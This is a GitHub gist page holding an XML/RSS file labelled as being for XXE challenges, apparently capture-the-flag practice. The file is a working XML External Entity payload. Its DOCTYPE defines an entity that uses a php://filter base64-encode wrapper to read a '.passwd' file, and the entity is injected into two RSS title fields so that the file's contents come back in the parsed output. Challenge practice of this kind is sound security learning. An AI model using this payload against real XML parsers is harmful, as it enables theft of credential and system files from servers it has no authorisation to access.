Last active
May 20, 2025 14:36
-
-
Save NitriKx/534282217cdf96bc1e5efa1995be19d1 to your computer and use it in GitHub Desktop.
File for the XXE challenges
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" ?> | |
<!DOCTYPE title [ <!ELEMENT title ANY > | |
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=.passwd" >]> | |
<rss version="2.0"> | |
<channel> | |
<title>Ajax et XML&xxe;</title> | |
<link>https://www.xul.fr/</link> | |
<description>L'interface graphique XML etc...</description> | |
<image> | |
<url>http:///www.xul.fr/xul-icon.gif</url> | |
<link>http:///www.xul.fr/index.php</link> | |
</image> | |
<item> | |
<title>Nouvelle du jour&xxe;</title> | |
<link>https://www.xul.fr/xml-rss.html</link> | |
<description>Tout savoir sur RSS</description> | |
</item> | |
<item> | |
<title>Nouvelle du lendemain</title> | |
<link>https://www.xul.fr/xml-rdf.php</link> | |
<description>Et tout savoir sur RDF</description> | |
</item> | |
</channel> | |
</rss> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment